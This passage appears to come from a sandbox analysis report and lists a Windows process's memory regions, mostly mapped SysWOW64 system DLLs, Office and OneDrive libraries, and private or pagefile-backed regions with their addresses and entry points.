0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 535 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 536 start_va = 0x6eeb0000 end_va = 0x6eec4fff monitored = 0 entry_point = 0x6eebb1a0 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\vcruntime140.dll") Region: id = 537 start_va = 0x6eed0000 end_va = 0x6eed9fff monitored = 0 entry_point = 0x6eed3200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 538 start_va = 0x6ef10000 end_va = 0x6efb6fff monitored = 0 entry_point = 0x6ef46240 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\SysWOW64\\dcomp.dll" (normalized: "c:\\windows\\syswow64\\dcomp.dll") Region: id = 539 start_va = 0x6efc0000 end_va = 0x6f000fff monitored = 0 entry_point = 0x6efc7fe0 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\SysWOW64\\DataExchange.dll" (normalized: "c:\\windows\\syswow64\\dataexchange.dll") Region: id = 540 start_va = 0x6f010000 end_va = 0x6f200fff monitored = 0 entry_point = 0x6f0f3cd0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 541 start_va = 0x6f3d0000 end_va = 0x6f3ecfff monitored = 0 entry_point = 0x6f3d3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 542 start_va = 0x6f4a0000 end_va = 0x6f6aefff monitored = 0 entry_point = 0x6f54b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 543 start_va = 0x6fff0000 end_va = 0x6fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 544 start_va = 0x70730000 end_va = 0x7073afff monitored = 0 entry_point = 0x70731d20 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 545 start_va = 0x70740000 end_va = 0x7076efff monitored = 0 entry_point = 0x707595e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 546 start_va = 0x70770000 end_va = 0x70782fff monitored = 0 entry_point = 0x70779950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 547 start_va = 0x70950000 end_va = 0x70968fff monitored = 0 entry_point = 0x709547e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 548 start_va = 0x70970000 end_va = 0x709e4fff monitored = 0 entry_point = 0x709a9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 549 start_va = 0x71fb0000 end_va = 0x72001fff monitored = 0 entry_point = 0x71fd8290 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\SysWOW64\\BCP47Langs.dll" (normalized: "c:\\windows\\syswow64\\bcp47langs.dll") Region: id = 550 start_va = 0x72010000 end_va = 0x72141fff monitored = 0 entry_point = 0x7207bf60 region_type = mapped_file name = "windows.globalization.dll" filename = "\\Windows\\SysWOW64\\Windows.Globalization.dll" (normalized: "c:\\windows\\syswow64\\windows.globalization.dll") Region: id = 551 start_va = 0x72760000 end_va = 0x7278bfff monitored = 0 entry_point = 0x72775ee0 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\SysWOW64\\fwbase.dll" (normalized: "c:\\windows\\syswow64\\fwbase.dll") Region: id = 552 start_va = 0x727c0000 end_va = 0x72842fff monitored = 0 entry_point = 0x727e37c0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 553 start_va = 0x72850000 end_va = 0x7299afff monitored = 0 entry_point = 0x728b1660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 554 start_va = 0x72a00000 end_va = 0x72c19fff monitored = 0 entry_point = 0x72a95550 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 555 start_va = 0x741a0000 end_va = 0x743bbfff monitored = 0 entry_point = 0x7436bc40 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 556 start_va = 0x74560000 end_va = 0x7457afff monitored = 0 entry_point = 0x74569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 557 start_va = 0x74580000 end_va = 0x7464cfff monitored = 0 entry_point = 0x745d29c0 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\SysWOW64\\twinapi.appcore.dll" (normalized: "c:\\windows\\syswow64\\twinapi.appcore.dll") Region: id = 558 start_va = 0x74810000 end_va = 0x748a1fff monitored = 0 entry_point = 0x74850380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 559 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 560 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 561 start_va = 0x748e0000 end_va = 0x749d1fff monitored = 0 entry_point = 0x74918070 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 562 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 563 start_va = 0x74ad0000 end_va = 0x74bbafff monitored = 0 entry_point = 0x74b0d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 564 start_va = 0x74c60000 end_va = 0x74d7efff monitored = 0 entry_point = 0x74ca5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 565 start_va = 0x74d80000 end_va = 0x74e11fff monitored = 0 entry_point = 0x74db8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 566 start_va = 0x74e20000 end_va = 0x74e63fff monitored = 0 entry_point = 0x74e27410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 567 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 568 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 569 start_va = 0x75010000 end_va = 0x7506dfff monitored = 0 entry_point = 0x75027470 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\SysWOW64\\FirewallAPI.dll" (normalized: "c:\\windows\\syswow64\\firewallapi.dll") Region: id = 570 start_va = 0x750d0000 end_va = 0x75216fff monitored = 0 entry_point = 0x750e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 571 start_va = 0x75220000 end_va = 0x752a3fff monitored = 0 entry_point = 0x75246220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 572 start_va = 0x752b0000 end_va = 0x7546cfff monitored = 0 entry_point = 0x75392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 573 start_va = 0x755e0000 end_va = 0x755f2fff monitored = 0 entry_point = 0x755e1d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 574 start_va = 0x75600000 end_va = 0x75659fff monitored = 0 entry_point = 0x75627e70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\SysWOW64\\coml2.dll" (normalized: "c:\\windows\\syswow64\\coml2.dll") Region: id = 575 start_va = 0x75660000 end_va = 0x7568afff monitored = 0 entry_point = 0x75665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 576 start_va = 0x75690000 end_va = 0x76a8efff monitored = 0 entry_point = 0x7584b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 577 start_va = 0x76a90000 end_va = 0x76ac6fff monitored = 0 entry_point = 0x76a93b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 578 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 579 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 580 start_va = 0x76e20000 end_va = 0x77318fff monitored = 0 entry_point = 0x77027610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 581 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 582 start_va = 0x773e0000 end_va = 0x7743efff monitored = 0 entry_point = 0x773e4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 583 start_va = 0x77440000 end_va = 0x7758efff monitored = 0 entry_point = 0x774f6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 584 start_va = 0x77590000 end_va = 0x775d4fff monitored = 0 entry_point = 0x775ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 585 start_va = 0x775e0000 end_va = 0x7766cfff monitored = 0 entry_point = 0x77629b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 586 start_va = 0x77670000 end_va = 0x7767efff monitored = 0 entry_point = 0x77672e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 587 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 588 start_va = 0x776f0000 end_va = 0x776f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 589 start_va = 0x77b10000 end_va = 0x77b8afff monitored = 0 entry_point = 0x77b2e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 590 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 591 start_va = 0x7fe90000 end_va = 0x7fe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe90000" filename = "" Region: id = 592 start_va = 0x7fea0000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fea0000" filename = "" Region: id = 593 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 594 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 595 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 596 start_va = 0x7fff0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 597 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 598 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 599 start_va = 0x67a00000 end_va = 0x67a0efff monitored = 0 entry_point = 0x67a03f00 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 600 start_va = 0x13fc0000 end_va = 0x13fc3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 601 start_va = 0x13fd0000 end_va = 0x13fd5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oregres.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\oregres.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\oregres.dll") Region: id = 602 start_va = 0x13fe0000 end_va = 0x13fe3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oregres.dll.mui" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\en-us\\oregres.dll.mui" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\en-us\\oregres.dll.mui") Region: id = 603 start_va = 0x13fd0000 end_va = 0x13fd5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oregres.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\oregres.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\oregres.dll") Region: id = 604 start_va = 0x13fe0000 end_va = 0x13fe3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oregres.dll.mui" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\en-us\\oregres.dll.mui" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\en-us\\oregres.dll.mui") Region: id = 605 start_va = 0x679d0000 end_va = 0x679f3fff monitored = 0 entry_point = 0x679d4820 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 606 start_va = 0x679a0000 end_va = 0x679c2fff monitored = 0 entry_point = 0x679a8940 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll") Region: id = 607 start_va = 0x13fd0000 end_va = 0x13fd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013fd0000" filename = "" Region: id = 608 start_va = 0x13fd0000 end_va = 0x13fd1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 609 start_va = 0x13fe0000 end_va = 0x13fe0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 610 start_va = 0x14140000 end_va = 0x14140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014140000" filename = "" Region: id = 611 start_va = 0x14cd0000 end_va = 0x14cd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014cd0000" filename = "" Region: id = 612 start_va = 0x14ce0000 end_va = 0x14cf8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014ce0000" filename = "" Region: id = 613 start_va = 0x14d00000 end_va = 0x14d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014d00000" filename = "" Region: id = 614 start_va = 0x14d40000 end_va = 0x14e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014d40000" filename = "" Region: id = 615 start_va = 0x14e40000 end_va = 0x14e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014e40000" filename = "" Region: id = 616 start_va = 0x14e50000 end_va = 0x14e50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000014e50000" filename = "" Region: id = 617 start_va = 0x14e60000 end_va = 0x14e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014e60000" filename = "" Region: id = 618 start_va = 0x14ea0000 end_va = 0x14f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014ea0000" filename = "" Region: id = 619 start_va = 0x14e50000 end_va = 0x14e51fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 620 start_va = 0x14fa0000 end_va = 0x14fa0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 621 start_va = 0x14fb0000 end_va = 0x150d3fff monitored = 0 entry_point = 0x14fb4920 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\SysWOW64\\networkexplorer.dll" (normalized: "c:\\windows\\syswow64\\networkexplorer.dll") Region: id = 622 start_va = 0x150e0000 end_va = 0x150e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "networkexplorer.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\NetworkExplorer.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\networkexplorer.dll.mui") Region: id = 623 start_va = 0x67570000 end_va = 0x6765dfff monitored = 0 entry_point = 0x67581a44 region_type = mapped_file name = "msvcr120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcr120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\msvcr120.dll") Region: id = 624 start_va = 0x67790000 end_va = 0x67800fff monitored = 0 entry_point = 0x677cb707 region_type = mapped_file name = "msvcp120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcp120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\msvcp120.dll") Region: id = 625 start_va = 0x67810000 end_va = 0x67992fff monitored = 0 entry_point = 0x6781c1ee region_type = mapped_file name = "filesyncshell.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncShell.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\filesyncshell.dll") Region: id = 626 start_va = 0x18060000 end_va = 0x1ac7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 627 start_va = 0x67710000 end_va = 0x67717fff monitored = 0 entry_point = 0x67711740 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 628 start_va = 0x67720000 end_va = 0x67739fff monitored = 0 entry_point = 0x6772b2f6 region_type = mapped_file name = "loggingplatform.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\LoggingPlatform.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\loggingplatform.dll") Region: id = 629 start_va = 0x67740000 end_va = 0x6778bfff monitored = 0 entry_point = 0x677695db region_type = mapped_file name = "telemetry.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\Telemetry.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\telemetry.dll") Region: id = 630 start_va = 0x70a00000 end_va = 0x70a9afff monitored = 0 entry_point = 0x70a3f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 631 start_va = 0x70ad0000 end_va = 0x70cdcfff monitored = 0 entry_point = 0x70bbacb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 632 start_va = 0x776e0000 end_va = 0x776e5fff monitored = 0 entry_point = 0x776e1460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 633 start_va = 0x14fb0000 end_va = 0x14fb3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014fb0000" filename = "" Region: id = 634 start_va = 0x67440000 end_va = 0x67563fff monitored = 0 entry_point = 0x67444920 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\SysWOW64\\networkexplorer.dll" (normalized: "c:\\windows\\syswow64\\networkexplorer.dll") Region: id = 635 start_va = 0x14fc0000 end_va = 0x14fc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000014fc0000" filename = "" Region: id = 636 start_va = 0x14fc0000 end_va = 0x14ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014fc0000" filename = "" Region: id = 637 start_va = 0x15000000 end_va = 0x150fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015000000" filename = "" Region: id = 638 start_va = 0x15100000 end_va = 0x15107fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015100000" filename = "" Region: id = 639 start_va = 0x672c0000 end_va = 0x67432fff monitored = 0 entry_point = 0x672c1000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\grooveex.dll") Region: id = 640 start_va = 0x15110000 end_va = 0x15111fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000015110000" filename = "" Region: id = 641 start_va = 0x67690000 end_va = 0x676f6fff monitored = 0 entry_point = 0x676ab610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 642 start_va = 0x67700000 end_va = 0x6770cfff monitored = 0 entry_point = 0x67703520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 643 start_va = 0x15120000 end_va = 0x1515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015120000" filename = "" Region: id = 644 start_va = 0x15160000 end_va = 0x1525ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015160000" filename = "" Region: id = 645 start_va = 0x70ce0000 end_va = 0x70e5dfff monitored = 0 entry_point = 0x70d5c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 646 start_va = 0x72420000 end_va = 0x726eafff monitored = 0 entry_point = 0x7265c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 647 start_va = 0x14140000 end_va = 0x14140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014140000" filename = "" Region: id = 648 start_va = 0x14cd0000 end_va = 0x14cd1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 649 start_va = 0x14ce0000 end_va = 0x14ce0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 650 start_va = 0x15120000 end_va = 0x15138fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015120000" filename = "" Region: id = 651 start_va = 0x15140000 end_va = 0x15158fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015140000" filename = "" Region: id = 652 start_va = 0x15160000 end_va = 